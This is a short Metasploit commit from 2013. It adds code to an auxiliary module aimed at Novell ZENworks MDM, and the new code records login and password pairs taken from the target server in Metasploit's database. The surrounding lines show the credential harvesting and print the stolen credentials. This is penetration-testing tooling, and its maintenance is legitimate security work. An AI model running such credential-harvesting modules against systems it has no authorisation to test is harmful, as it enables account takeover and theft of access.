Report auth info

unstable
sinn3r 2013-06-05 02:06:32 -05:00
parent ed4766dc46
commit a5a3f40394
1 changed files with 9 additions and 0 deletions

View File

@ -84,6 +84,15 @@ class Metasploit3 < Msf::Auxiliary
user,pass = get_creds(session_id,cmd)
print_good("Got creds. Login:#{user} Password:#{pass}")
print_good("Access the admin interface here: #{ip}:#{rport}#{target_uri.path}dashboard/")
report_auth_info(
:host => ip,
:port => rport,
:sname => "novellmdm",
:user => user,
:pass => pass,
:active => true
)
else
print_error("Zenworks MDM does not appear to be running at #{ip}")
return :abort